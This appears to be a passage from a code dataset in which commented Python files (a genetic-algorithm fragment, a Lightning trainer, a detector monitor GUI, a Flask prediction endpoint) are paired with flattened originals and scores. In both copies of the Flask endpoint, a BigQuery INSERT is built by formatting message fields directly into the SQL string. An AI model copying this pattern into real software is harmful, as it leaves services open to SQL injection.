        self.population = [self._generator() for _ in range(size)]

    def reset_fitness(self, population=None):
        """Mark individuals as needing fitness re-evaluation.

        Parameters
        ----------
        population : list of `Chromosome`, optional
            Individuals to reset. Default: the island's current
            population.
        """
        targets = self.population if population is None else population
        for member in targets:
            member.fit_set = False
0.923631
0.798933
from pathlib import Path

import cv2
import numpy as np
import pytorch_lightning as pl
import torch
import torchvision
from pytorch_lightning.callbacks import ModelCheckpoint
from torch.nn import functional as F
from torch.utils.data import DataLoader

from core.dataloaders.mit_dataloader import MitData
from core.network.custom_nets import FIP


class LitModel(pl.LightningModule):
    """Lightning wrapper training the FIP network on the MIT dataset.

    Trains with summed MSE loss and periodically logs ground-truth,
    prediction and input image grids to TensorBoard.
    """

    def __init__(self, data_dir: str, batch_size: int, num_workers: int = 6,
                 lr: float = 1e-4, **kwargs) -> None:
        """ @lr: learning rate """
        super().__init__()
        self.model = FIP()
        self.save_hyperparameters()

    def forward(self, x):
        """Forward pass: delegate to the wrapped FIP model."""
        return self.model(x)

    def configure_optimizers(self):
        # eps chosen to match the TensorFlow Adam default.
        optimizer = torch.optim.Adam(self.parameters(), lr=self.hparams.lr,
                                     eps=1e-7)
        return optimizer

    def setup(self, stage=None):
        # Two training sets (curriculum switch in train_dataloader) and
        # one validation set, all rooted at hparams.data_dir.
        base = Path(self.hparams.data_dir)
        train_root = base.joinpath('train')
        self.mit_train_1 = MitData(train_root.joinpath('set-1'),
                                   is_train=True)
        self.mit_train_2 = MitData(train_root.joinpath('set-2'),
                                   is_train=True)
        self.mit_val = MitData(base.joinpath('val'), is_train=False)

    def train_dataloader(self):
        # Curriculum: set-1 for the first 120 epochs, set-2 afterwards.
        dataset = self.mit_train_1 if self.current_epoch < 120 \
            else self.mit_train_2
        return DataLoader(dataset,
                          batch_size=self.hparams.batch_size,
                          shuffle=True,
                          num_workers=self.hparams.num_workers)

    def val_dataloader(self):
        return DataLoader(self.mit_val,
                          batch_size=self.hparams.batch_size,
                          shuffle=False,
                          num_workers=self.hparams.num_workers)

    def _vis_images(self, tensor, kind, prefix='val'):
        # Log up to the first ten images of the batch as a grid.
        # kind: 0 = ground truth, 1 = predictions, anything else = input.
        snapshot = tensor.detach().clone()[0:10]
        imgs = snapshot.cpu().numpy()
        for i, chw in enumerate(imgs):
            hwc = np.transpose(chw, [1, 2, 0])
            hwc = cv2.cvtColor(hwc, cv2.COLOR_BGR2RGB)
            if kind == 1:
                # Predictions are clipped into displayable [0, 1] range.
                hwc = np.clip(hwc, 0, 1)
            else:
                hwc = cv2.normalize(hwc, None, alpha=0, beta=1,
                                    norm_type=cv2.NORM_MINMAX,
                                    dtype=cv2.CV_32F)
            imgs[i] = np.transpose(hwc, [2, 0, 1])
        grid = torchvision.utils.make_grid(torch.tensor(imgs))
        if kind == 0:
            self.logger.experiment.add_image(f'{prefix}_gt', grid,
                                             self.global_step)
        elif kind == 1:
            self.logger.experiment.add_image(f'{prefix}_preds', grid,
                                             self.global_step)
        else:
            self.logger.experiment.add_image(f'{prefix}_input', grid,
                                             self.global_step)

    def validation_step(self, batch, batch_idx):
        x, y = batch
        preds = self(x)
        loss = F.mse_loss(preds, y, reduction='sum')
        # Visualize every 250th batch.
        if batch_idx % 250 == 0:
            self._vis_images(y, 0, prefix='val')
            self._vis_images(preds, 1, prefix='val')
            self._vis_images(x, 2, prefix='val')
        return {'loss': loss, 'log': {'val_loss': loss}}

    def training_step(self, batch, batch_idx):
        x, y = batch
        preds = self(x)
        loss = F.mse_loss(preds, y, reduction='sum')
        # Visualize every 250th batch.
        if batch_idx % 250 == 0:
            self._vis_images(y, 0, prefix='train')
            self._vis_images(preds, 1, prefix='train')
            self._vis_images(x, 2, prefix='train')
        return {'loss': loss, 'log': {'train_loss': loss}}

    def validation_epoch_end(self, outputs):
        # Average the per-batch validation losses.
        losses = [out['loss'] for out in outputs]
        return {'val_loss': torch.stack(losses).mean()}


if __name__ == "__main__":
    data_dir = '/media/nthere/datasets/FastImageProcessing/data/style/'
    model = LitModel(data_dir=data_dir, batch_size=1)
    checkpoint_cb = ModelCheckpoint(filepath='./style-2/', save_top_k=10,
                                    save_weights_only=False)
    trainer = pl.Trainer(gpus=[0],
                         max_epochs=180,
                         checkpoint_callback=checkpoint_cb,
                         # resume_from_checkpoint='./style/_ckpt_epoch_48.ckpt',
                         reload_dataloaders_every_epoch=True)
    trainer.fit(model)
src/core/trainers/filter_trainer.py
from pathlib import Path

import cv2
import numpy as np
import pytorch_lightning as pl
import torch
import torchvision
from pytorch_lightning.callbacks import ModelCheckpoint
from torch.nn import functional as F
from torch.utils.data import DataLoader

from core.dataloaders.mit_dataloader import MitData
from core.network.custom_nets import FIP


class LitModel(pl.LightningModule):
    """Lightning wrapper training the FIP network on the MIT dataset.

    Trains with summed MSE loss and periodically logs ground-truth,
    prediction and input image grids to TensorBoard.
    """

    def __init__(self, data_dir: str, batch_size: int, num_workers: int = 6,
                 lr: float = 1e-4, **kwargs) -> None:
        """ @lr: learning rate """
        super().__init__()
        self.model = FIP()
        self.save_hyperparameters()

    def forward(self, x):
        """Forward pass: delegate to the wrapped FIP model."""
        return self.model(x)

    def configure_optimizers(self):
        # eps chosen to match the TensorFlow Adam default.
        optimizer = torch.optim.Adam(self.parameters(), lr=self.hparams.lr,
                                     eps=1e-7)
        return optimizer

    def setup(self, stage=None):
        # Two training sets (curriculum switch in train_dataloader) and
        # one validation set, all rooted at hparams.data_dir.
        base = Path(self.hparams.data_dir)
        train_root = base.joinpath('train')
        self.mit_train_1 = MitData(train_root.joinpath('set-1'),
                                   is_train=True)
        self.mit_train_2 = MitData(train_root.joinpath('set-2'),
                                   is_train=True)
        self.mit_val = MitData(base.joinpath('val'), is_train=False)

    def train_dataloader(self):
        # Curriculum: set-1 for the first 120 epochs, set-2 afterwards.
        dataset = self.mit_train_1 if self.current_epoch < 120 \
            else self.mit_train_2
        return DataLoader(dataset,
                          batch_size=self.hparams.batch_size,
                          shuffle=True,
                          num_workers=self.hparams.num_workers)

    def val_dataloader(self):
        return DataLoader(self.mit_val,
                          batch_size=self.hparams.batch_size,
                          shuffle=False,
                          num_workers=self.hparams.num_workers)

    def _vis_images(self, tensor, kind, prefix='val'):
        # Log up to the first ten images of the batch as a grid.
        # kind: 0 = ground truth, 1 = predictions, anything else = input.
        snapshot = tensor.detach().clone()[0:10]
        imgs = snapshot.cpu().numpy()
        for i, chw in enumerate(imgs):
            hwc = np.transpose(chw, [1, 2, 0])
            hwc = cv2.cvtColor(hwc, cv2.COLOR_BGR2RGB)
            if kind == 1:
                # Predictions are clipped into displayable [0, 1] range.
                hwc = np.clip(hwc, 0, 1)
            else:
                hwc = cv2.normalize(hwc, None, alpha=0, beta=1,
                                    norm_type=cv2.NORM_MINMAX,
                                    dtype=cv2.CV_32F)
            imgs[i] = np.transpose(hwc, [2, 0, 1])
        grid = torchvision.utils.make_grid(torch.tensor(imgs))
        if kind == 0:
            self.logger.experiment.add_image(f'{prefix}_gt', grid,
                                             self.global_step)
        elif kind == 1:
            self.logger.experiment.add_image(f'{prefix}_preds', grid,
                                             self.global_step)
        else:
            self.logger.experiment.add_image(f'{prefix}_input', grid,
                                             self.global_step)

    def validation_step(self, batch, batch_idx):
        x, y = batch
        preds = self(x)
        loss = F.mse_loss(preds, y, reduction='sum')
        # Visualize every 250th batch.
        if batch_idx % 250 == 0:
            self._vis_images(y, 0, prefix='val')
            self._vis_images(preds, 1, prefix='val')
            self._vis_images(x, 2, prefix='val')
        return {'loss': loss, 'log': {'val_loss': loss}}

    def training_step(self, batch, batch_idx):
        x, y = batch
        preds = self(x)
        loss = F.mse_loss(preds, y, reduction='sum')
        # Visualize every 250th batch.
        if batch_idx % 250 == 0:
            self._vis_images(y, 0, prefix='train')
            self._vis_images(preds, 1, prefix='train')
            self._vis_images(x, 2, prefix='train')
        return {'loss': loss, 'log': {'train_loss': loss}}

    def validation_epoch_end(self, outputs):
        # Average the per-batch validation losses.
        losses = [out['loss'] for out in outputs]
        return {'val_loss': torch.stack(losses).mean()}


if __name__ == "__main__":
    data_dir = '/media/nthere/datasets/FastImageProcessing/data/style/'
    model = LitModel(data_dir=data_dir, batch_size=1)
    checkpoint_cb = ModelCheckpoint(filepath='./style-2/', save_top_k=10,
                                    save_weights_only=False)
    trainer = pl.Trainer(gpus=[0],
                         max_epochs=180,
                         checkpoint_callback=checkpoint_cb,
                         # resume_from_checkpoint='./style/_ckpt_epoch_48.ckpt',
                         reload_dataloaders_every_epoch=True)
    trainer.fit(model)
0.882028
0.385086
from online_monitor.receiver.receiver import Receiver
from zmq.utils import jsonapi
import numpy as np
import time
from PyQt4 import Qt
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.ptime as ptime
from pyqtgraph.dockarea import DockArea, Dock
from online_monitor.utils import utils


class PybarFEI4(Receiver):
    """Online-monitor receiver displaying live pyBAR FE-I4 data.

    Builds a dock area with occupancy, TOT, TDC, event/trigger status,
    service-record and hit-timing plots plus a status bar with rates
    and controls, and updates them from the deserialized dictionaries
    delivered by the converter.
    """

    def setup_receiver(self):
        # Bidirectional so the GUI can send commands (reset, readout
        # integration depth) back to the converter.
        self.set_bidirectional_communication()

    def setup_widgets(self, parent, name):
        """Create all docks, plots and status widgets inside *parent*."""
        dock_area = DockArea()
        parent.addTab(dock_area, name)
        # Docks
        dock_occcupancy = Dock("Occupancy", size=(400, 400))
        dock_run_config = Dock("Run configuration", size=(400, 400))
        dock_global_config = Dock("Global configuration", size=(400, 400))
        dock_tot = Dock("Time over threshold values (TOT)", size=(400, 400))
        dock_tdc = Dock("Time digital converter values (TDC)", size=(400, 400))
        dock_event_status = Dock("Event status", size=(400, 400))
        dock_trigger_status = Dock("Trigger status", size=(400, 400))
        dock_service_records = Dock("Service records", size=(400, 400))
        dock_hit_timing = Dock("Hit timing (rel. BCID)", size=(400, 400))
        dock_status = Dock("Status", size=(800, 40))
        dock_area.addDock(dock_global_config, 'left')
        dock_area.addDock(dock_run_config, 'above', dock_global_config)
        dock_area.addDock(dock_occcupancy, 'above', dock_run_config)
        dock_area.addDock(dock_tdc, 'right', dock_occcupancy)
        dock_area.addDock(dock_tot, 'above', dock_tdc)
        dock_area.addDock(dock_service_records, 'bottom', dock_occcupancy)
        dock_area.addDock(dock_trigger_status, 'above', dock_service_records)
        dock_area.addDock(dock_event_status, 'above', dock_trigger_status)
        dock_area.addDock(dock_hit_timing, 'bottom', dock_tot)
        dock_area.addDock(dock_status, 'top')  # Status dock on top

        # Status bar: rate/timestamp labels, integration spin box, reset.
        cw = QtGui.QWidget()
        cw.setStyleSheet("QWidget {background-color:white}")
        layout = QtGui.QGridLayout()
        cw.setLayout(layout)
        self.rate_label = QtGui.QLabel("Readout Rate\n0 Hz")
        self.hit_rate_label = QtGui.QLabel("Hit Rate\n0 Hz")
        self.event_rate_label = QtGui.QLabel("Event Rate\n0 Hz")
        self.timestamp_label = QtGui.QLabel("Data Timestamp\n")
        self.plot_delay_label = QtGui.QLabel("Plot Delay\n")
        self.scan_parameter_label = QtGui.QLabel("Scan Parameters\n")
        self.spin_box = Qt.QSpinBox(value=0)
        self.spin_box.setMaximum(1000000)
        self.spin_box.setSuffix(" Readouts")
        self.reset_button = QtGui.QPushButton('Reset')
        layout.addWidget(self.timestamp_label, 0, 0, 0, 1)
        layout.addWidget(self.plot_delay_label, 0, 1, 0, 1)
        layout.addWidget(self.rate_label, 0, 2, 0, 1)
        layout.addWidget(self.hit_rate_label, 0, 3, 0, 1)
        layout.addWidget(self.event_rate_label, 0, 4, 0, 1)
        layout.addWidget(self.scan_parameter_label, 0, 5, 0, 1)
        layout.addWidget(self.spin_box, 0, 6, 0, 1)
        layout.addWidget(self.reset_button, 0, 7, 0, 1)
        dock_status.addWidget(cw)

        # Connect widgets: spin box value 0 means "integrate all hits".
        self.reset_button.clicked.connect(lambda: self.send_command('RESET'))
        self.spin_box.valueChanged.connect(lambda value: self.send_command(str(value)))

        # Run config dock
        self.run_conf_list_widget = Qt.QListWidget()
        dock_run_config.addWidget(self.run_conf_list_widget)

        # Global config dock
        self.global_conf_list_widget = Qt.QListWidget()
        dock_global_config.addWidget(self.global_conf_list_widget)

        # Different plot docks
        occupancy_graphics = pg.GraphicsLayoutWidget()
        occupancy_graphics.show()
        view = occupancy_graphics.addViewBox()
        self.occupancy_img = pg.ImageItem(border='w')
        view.addItem(self.occupancy_img)
        # NOTE(review): 80 x 336 presumably matches the FE-I4 pixel
        # matrix dimensions - confirm against the converter output.
        view.setRange(QtCore.QRectF(0, 0, 80, 336))
        dock_occcupancy.addWidget(occupancy_graphics)

        # stepMode=True plots need len(x) == len(y) + 1 (bin edges).
        tot_plot_widget = pg.PlotWidget(background="w")
        self.tot_plot = tot_plot_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True)
        tot_plot_widget.showGrid(y=True)
        dock_tot.addWidget(tot_plot_widget)

        tdc_plot_widget = pg.PlotWidget(background="w")
        self.tdc_plot = tdc_plot_widget.plot(np.linspace(-0.5, 4095.5, 4097), np.zeros((4096)), stepMode=True)
        tdc_plot_widget.showGrid(y=True)
        tdc_plot_widget.setXRange(0, 800, update=True)
        dock_tdc.addWidget(tdc_plot_widget)

        event_status_widget = pg.PlotWidget()
        self.event_status_plot = event_status_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True)
        event_status_widget.showGrid(y=True)
        dock_event_status.addWidget(event_status_widget)

        trigger_status_widget = pg.PlotWidget()
        self.trigger_status_plot = trigger_status_widget.plot(np.linspace(-0.5, 7.5, 9), np.zeros((8)), stepMode=True)
        trigger_status_widget.showGrid(y=True)
        dock_trigger_status.addWidget(trigger_status_widget)

        service_record_widget = pg.PlotWidget()
        self.service_record_plot = service_record_widget.plot(np.linspace(-0.5, 31.5, 33), np.zeros((32)), stepMode=True)
        service_record_widget.showGrid(y=True)
        dock_service_records.addWidget(service_record_widget)

        hit_timing_widget = pg.PlotWidget()
        self.hit_timing_plot = hit_timing_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True)
        hit_timing_widget.showGrid(y=True)
        dock_hit_timing.addWidget(hit_timing_widget)

        self.plot_delay = 0

    def deserialze_data(self, data):
        # Name kept as-is (typo included): the base Receiver calls it.
        return jsonapi.loads(data, object_hook=utils.json_numpy_obj_hook)

    def handle_data(self, data):
        """Update plots (histogram payload) or status labels (meta data)."""
        def update_rate(fps, hps, recent_total_hits, eps, recent_total_events):
            self.rate_label.setText("Readout Rate\n%d Hz" % fps)
            if self.spin_box.value() == 0:  # show number of hits, all hits are integrated
                self.hit_rate_label.setText("Total Hits\n%d" % int(recent_total_hits))
            else:
                self.hit_rate_label.setText("Hit Rate\n%d Hz" % int(hps))
            if self.spin_box.value() == 0:  # show number of events
                self.event_rate_label.setText("Total Events\n%d" % int(recent_total_events))
            else:
                self.event_rate_label.setText("Event Rate\n%d Hz" % int(eps))

        if 'meta_data' not in data:
            self.occupancy_img.setImage(data['occupancy'][:, :, 0], autoDownsample=True)
            self.tot_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['tot_hist'], fillLevel=0, brush=(0, 0, 255, 150))
            # BUG FIX: use the same 4096-bin edge array the plot was
            # created with; -0.5..4096.5 over 4097 points gives a bin
            # width of 4097/4096, shifting bins progressively.
            self.tdc_plot.setData(x=np.linspace(-0.5, 4095.5, 4097), y=data['tdc_counters'], fillLevel=0, brush=(0, 0, 255, 150))
            self.event_status_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150))
            self.service_record_plot.setData(x=np.linspace(-0.5, 31.5, 33), y=data['service_records_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150))
            self.trigger_status_plot.setData(x=np.linspace(-0.5, 7.5, 9), y=data['trigger_error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150))
            self.hit_timing_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['rel_bcid_hist'][:16], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150))
        else:
            update_rate(data['meta_data']['fps'], data['meta_data']['hps'], data['meta_data']['total_hits'], data['meta_data']['eps'], data['meta_data']['total_events'])
            self.timestamp_label.setText("Data Timestamp\n%s" % time.asctime(time.localtime(data['meta_data']['timestamp_stop'])))
            # items() instead of Python-2-only iteritems() (works on 2 and 3).
            self.scan_parameter_label.setText("Scan Parameters\n%s" % ', '.join('%s: %s' % (str(key), str(val)) for key, val in data['meta_data']['scan_parameters'].items()))
            now = ptime.time()
            # Exponentially smoothed delay between data timestamp and plotting.
            self.plot_delay = self.plot_delay * 0.9 + (now - data['meta_data']['timestamp_stop']) * 0.1
            # BUG FIX: the original one-line conditional expression bound
            # over the whole '%' formatting, so the "Plot Delay" caption
            # was dropped whenever the delay was below 5 s.
            if abs(self.plot_delay) > 5:
                self.plot_delay_label.setText("Plot Delay\nnot realtime")
            else:
                self.plot_delay_label.setText("Plot Delay\n%1.2f ms" % (self.plot_delay * 1.e3))
silab_online_monitor/receiver/pybar_fei4.py
from online_monitor.receiver.receiver import Receiver from zmq.utils import jsonapi import numpy as np import time from PyQt4 import Qt import pyqtgraph as pg from pyqtgraph.Qt import QtCore, QtGui import pyqtgraph.ptime as ptime from pyqtgraph.dockarea import DockArea, Dock from online_monitor.utils import utils class PybarFEI4(Receiver): def setup_receiver(self): self.set_bidirectional_communication() # We want to change converter settings def setup_widgets(self, parent, name): dock_area = DockArea() parent.addTab(dock_area, name) # Docks dock_occcupancy = Dock("Occupancy", size=(400, 400)) dock_run_config = Dock("Run configuration", size=(400, 400)) dock_global_config = Dock("Global configuration", size=(400, 400)) dock_tot = Dock("Time over threshold values (TOT)", size=(400, 400)) dock_tdc = Dock("Time digital converter values (TDC)", size=(400, 400)) dock_event_status = Dock("Event status", size=(400, 400)) dock_trigger_status = Dock("Trigger status", size=(400, 400)) dock_service_records = Dock("Service records", size=(400, 400)) dock_hit_timing = Dock("Hit timing (rel. 
BCID)", size=(400, 400)) dock_status = Dock("Status", size=(800, 40)) dock_area.addDock(dock_global_config, 'left') dock_area.addDock(dock_run_config, 'above', dock_global_config) dock_area.addDock(dock_occcupancy, 'above', dock_run_config) dock_area.addDock(dock_tdc, 'right', dock_occcupancy) dock_area.addDock(dock_tot, 'above', dock_tdc) dock_area.addDock(dock_service_records, 'bottom', dock_occcupancy) dock_area.addDock(dock_trigger_status, 'above', dock_service_records) dock_area.addDock(dock_event_status, 'above', dock_trigger_status) dock_area.addDock(dock_hit_timing, 'bottom', dock_tot) dock_area.addDock(dock_status, 'top') # Status dock on top cw = QtGui.QWidget() cw.setStyleSheet("QWidget {background-color:white}") layout = QtGui.QGridLayout() cw.setLayout(layout) self.rate_label = QtGui.QLabel("Readout Rate\n0 Hz") self.hit_rate_label = QtGui.QLabel("Hit Rate\n0 Hz") self.event_rate_label = QtGui.QLabel("Event Rate\n0 Hz") self.timestamp_label = QtGui.QLabel("Data Timestamp\n") self.plot_delay_label = QtGui.QLabel("Plot Delay\n") self.scan_parameter_label = QtGui.QLabel("Scan Parameters\n") self.spin_box = Qt.QSpinBox(value=0) self.spin_box.setMaximum(1000000) self.spin_box.setSuffix(" Readouts") self.reset_button = QtGui.QPushButton('Reset') layout.addWidget(self.timestamp_label, 0, 0, 0, 1) layout.addWidget(self.plot_delay_label, 0, 1, 0, 1) layout.addWidget(self.rate_label, 0, 2, 0, 1) layout.addWidget(self.hit_rate_label, 0, 3, 0, 1) layout.addWidget(self.event_rate_label, 0, 4, 0, 1) layout.addWidget(self.scan_parameter_label, 0, 5, 0, 1) layout.addWidget(self.spin_box, 0, 6, 0, 1) layout.addWidget(self.reset_button, 0, 7, 0, 1) dock_status.addWidget(cw) # Connect widgets self.reset_button.clicked.connect(lambda: self.send_command('RESET')) self.spin_box.valueChanged.connect(lambda value: self.send_command(str(value))) # Run config dock self.run_conf_list_widget = Qt.QListWidget() dock_run_config.addWidget(self.run_conf_list_widget) # Global config 
dock self.global_conf_list_widget = Qt.QListWidget() dock_global_config.addWidget(self.global_conf_list_widget) # Different plot docks occupancy_graphics = pg.GraphicsLayoutWidget() occupancy_graphics.show() view = occupancy_graphics.addViewBox() self.occupancy_img = pg.ImageItem(border='w') view.addItem(self.occupancy_img) view.setRange(QtCore.QRectF(0, 0, 80, 336)) dock_occcupancy.addWidget(occupancy_graphics) tot_plot_widget = pg.PlotWidget(background="w") self.tot_plot = tot_plot_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) tot_plot_widget.showGrid(y=True) dock_tot.addWidget(tot_plot_widget) tdc_plot_widget = pg.PlotWidget(background="w") self.tdc_plot = tdc_plot_widget.plot(np.linspace(-0.5, 4095.5, 4097), np.zeros((4096)), stepMode=True) tdc_plot_widget.showGrid(y=True) tdc_plot_widget.setXRange(0, 800, update=True) dock_tdc.addWidget(tdc_plot_widget) event_status_widget = pg.PlotWidget() self.event_status_plot = event_status_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) event_status_widget.showGrid(y=True) dock_event_status.addWidget(event_status_widget) trigger_status_widget = pg.PlotWidget() self.trigger_status_plot = trigger_status_widget.plot(np.linspace(-0.5, 7.5, 9), np.zeros((8)), stepMode=True) trigger_status_widget.showGrid(y=True) dock_trigger_status.addWidget(trigger_status_widget) service_record_widget = pg.PlotWidget() self.service_record_plot = service_record_widget.plot(np.linspace(-0.5, 31.5, 33), np.zeros((32)), stepMode=True) service_record_widget.showGrid(y=True) dock_service_records.addWidget(service_record_widget) hit_timing_widget = pg.PlotWidget() self.hit_timing_plot = hit_timing_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) hit_timing_widget.showGrid(y=True) dock_hit_timing.addWidget(hit_timing_widget) self.plot_delay = 0 def deserialze_data(self, data): return jsonapi.loads(data, object_hook=utils.json_numpy_obj_hook) def handle_data(self, data): def 
update_rate(fps, hps, recent_total_hits, eps, recent_total_events): self.rate_label.setText("Readout Rate\n%d Hz" % fps) if self.spin_box.value() == 0: # show number of hits, all hits are integrated self.hit_rate_label.setText("Total Hits\n%d" % int(recent_total_hits)) else: self.hit_rate_label.setText("Hit Rate\n%d Hz" % int(hps)) if self.spin_box.value() == 0: # show number of events self.event_rate_label.setText("Total Events\n%d" % int(recent_total_events)) else: self.event_rate_label.setText("Event Rate\n%d Hz" % int(eps)) if 'meta_data' not in data: self.occupancy_img.setImage(data['occupancy'][:, :, 0], autoDownsample=True) self.tot_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['tot_hist'], fillLevel=0, brush=(0, 0, 255, 150)) self.tdc_plot.setData(x=np.linspace(-0.5, 4096.5, 4097), y=data['tdc_counters'], fillLevel=0, brush=(0, 0, 255, 150)) self.event_status_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.service_record_plot.setData(x=np.linspace(-0.5, 31.5, 33), y=data['service_records_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.trigger_status_plot.setData(x=np.linspace(-0.5, 7.5, 9), y=data['trigger_error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.hit_timing_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['rel_bcid_hist'][:16], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) else: update_rate(data['meta_data']['fps'], data['meta_data']['hps'], data['meta_data']['total_hits'], data['meta_data']['eps'], data['meta_data']['total_events']) self.timestamp_label.setText("Data Timestamp\n%s" % time.asctime(time.localtime(data['meta_data']['timestamp_stop']))) self.scan_parameter_label.setText("Scan Parameters\n%s" % ', '.join('%s: %s' % (str(key), str(val)) for key, val in data['meta_data']['scan_parameters'].iteritems())) now = ptime.time() self.plot_delay = self.plot_delay * 0.9 + (now - 
data['meta_data']['timestamp_stop']) * 0.1 self.plot_delay_label.setText("Plot Delay\n%s" % 'not realtime' if abs(self.plot_delay) > 5 else "%1.2f ms" % (self.plot_delay * 1.e3))
0.478041
0.16654
import base64 import json import logging import os from flask import Flask from flask import request import googleapiclient.discovery import google.cloud.bigquery import google.cloud.pubsub_v1 logging.basicConfig(level=logging.DEBUG) PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT'] MODEL_NAME = os.environ['MODEL_NAME'] DATASET_ID = os.environ['DATASET_ID'] SEQ_LEN = int(os.environ['SEQ_LEN']) PUB_TOPIC = os.environ['PUB_TOPIC'] FEAT_COLS = ['ActivePower_{}'.format(i) for i in range(1, SEQ_LEN + 1)] app = Flask(__name__) ml_service = googleapiclient.discovery.build('ml', 'v1') bq_client = google.cloud.bigquery.Client() publisher = google.cloud.pubsub_v1.PublisherClient() topic_path = publisher.topic_path(PROJECT_ID, PUB_TOPIC) @app.route('/upload', methods=['POST']) def process_msg(): """Process the incoming request. Example of an incoming json message: { "message": {"data": {"timestamp": ["2018-10-30 00:00:00", ...], "power": [111.0, ...]}}, ... } The message is a json data, we should 1. write the json data to BQ 2. forward the json data to CMLE 3. write the prediction to BQ Returns: (str, int), message and HTTP code. """ try: envelope = json.loads(request.data.decode('utf-8')) payload = base64.b64decode(envelope['message']['data']) data = json.loads(payload, encoding='utf-8') time_stamp = data['timestamp'] active_power = data['power'] device_id = data['device_id'] logging.info('0. Got msg from device: {}'.format(device_id)) # forward the data to CMLE instance = {k:v for k, v in zip(FEAT_COLS, active_power)} response = ml_service.projects().predict( name='projects/{}/models/{}'.format(PROJECT_ID, MODEL_NAME), body={'instances': [instance]} ).execute() logging.info('1. 
CMLE returned: {}'.format(response)) preds = response['predictions'][0] probs = preds['probabilities'] # publish the result data = {'device_id': device_id, 'probs': probs, 'data': active_power, 'time': time_stamp} data = json.dumps(data).encode('utf-8') publisher.publish(topic_path, data=data) logging.info('2. Result published: {}'.format(data)) # write data to BQ query = ('INSERT INTO EnergyDisaggregation.ActivePower (time, device_id, power) ' 'VALUES (timestamp("{}"), "{}", {});'.format( time_stamp[-1], device_id, active_power[-1])) query_job = bq_client.query(query) _ = query_job.result() logging.info('3. Query executed: {}'.format(query)) # write CMLE result to BQ table_ref = bq_client.dataset(DATASET_ID).table('Predictions') table = bq_client.get_table(table_ref) rows_to_insert = [ (time_stamp[-1], device_id, i, int(prob > 0.5), prob) for i, prob in enumerate(probs) ] errors = bq_client.insert_rows(table, rows_to_insert) logging.info('4. Resultes recorded: {}'.format(rows_to_insert)) if errors: raise ValueError('{}'.format(errors)) # ack return 'OK', 200 except Exception as e: logging.info('Error: {}'.format(e)) return 'Error', 201 if __name__ == '__main__': app.run(host='127.0.0.1', port=8080)
examples/e2e-home-appliance-status-monitoring/server/main.py
import base64 import json import logging import os from flask import Flask from flask import request import googleapiclient.discovery import google.cloud.bigquery import google.cloud.pubsub_v1 logging.basicConfig(level=logging.DEBUG) PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT'] MODEL_NAME = os.environ['MODEL_NAME'] DATASET_ID = os.environ['DATASET_ID'] SEQ_LEN = int(os.environ['SEQ_LEN']) PUB_TOPIC = os.environ['PUB_TOPIC'] FEAT_COLS = ['ActivePower_{}'.format(i) for i in range(1, SEQ_LEN + 1)] app = Flask(__name__) ml_service = googleapiclient.discovery.build('ml', 'v1') bq_client = google.cloud.bigquery.Client() publisher = google.cloud.pubsub_v1.PublisherClient() topic_path = publisher.topic_path(PROJECT_ID, PUB_TOPIC) @app.route('/upload', methods=['POST']) def process_msg(): """Process the incoming request. Example of an incoming json message: { "message": {"data": {"timestamp": ["2018-10-30 00:00:00", ...], "power": [111.0, ...]}}, ... } The message is a json data, we should 1. write the json data to BQ 2. forward the json data to CMLE 3. write the prediction to BQ Returns: (str, int), message and HTTP code. """ try: envelope = json.loads(request.data.decode('utf-8')) payload = base64.b64decode(envelope['message']['data']) data = json.loads(payload, encoding='utf-8') time_stamp = data['timestamp'] active_power = data['power'] device_id = data['device_id'] logging.info('0. Got msg from device: {}'.format(device_id)) # forward the data to CMLE instance = {k:v for k, v in zip(FEAT_COLS, active_power)} response = ml_service.projects().predict( name='projects/{}/models/{}'.format(PROJECT_ID, MODEL_NAME), body={'instances': [instance]} ).execute() logging.info('1. 
CMLE returned: {}'.format(response)) preds = response['predictions'][0] probs = preds['probabilities'] # publish the result data = {'device_id': device_id, 'probs': probs, 'data': active_power, 'time': time_stamp} data = json.dumps(data).encode('utf-8') publisher.publish(topic_path, data=data) logging.info('2. Result published: {}'.format(data)) # write data to BQ query = ('INSERT INTO EnergyDisaggregation.ActivePower (time, device_id, power) ' 'VALUES (timestamp("{}"), "{}", {});'.format( time_stamp[-1], device_id, active_power[-1])) query_job = bq_client.query(query) _ = query_job.result() logging.info('3. Query executed: {}'.format(query)) # write CMLE result to BQ table_ref = bq_client.dataset(DATASET_ID).table('Predictions') table = bq_client.get_table(table_ref) rows_to_insert = [ (time_stamp[-1], device_id, i, int(prob > 0.5), prob) for i, prob in enumerate(probs) ] errors = bq_client.insert_rows(table, rows_to_insert) logging.info('4. Resultes recorded: {}'.format(rows_to_insert)) if errors: raise ValueError('{}'.format(errors)) # ack return 'OK', 200 except Exception as e: logging.info('Error: {}'.format(e)) return 'Error', 201 if __name__ == '__main__': app.run(host='127.0.0.1', port=8080)
0.410874
0.148726
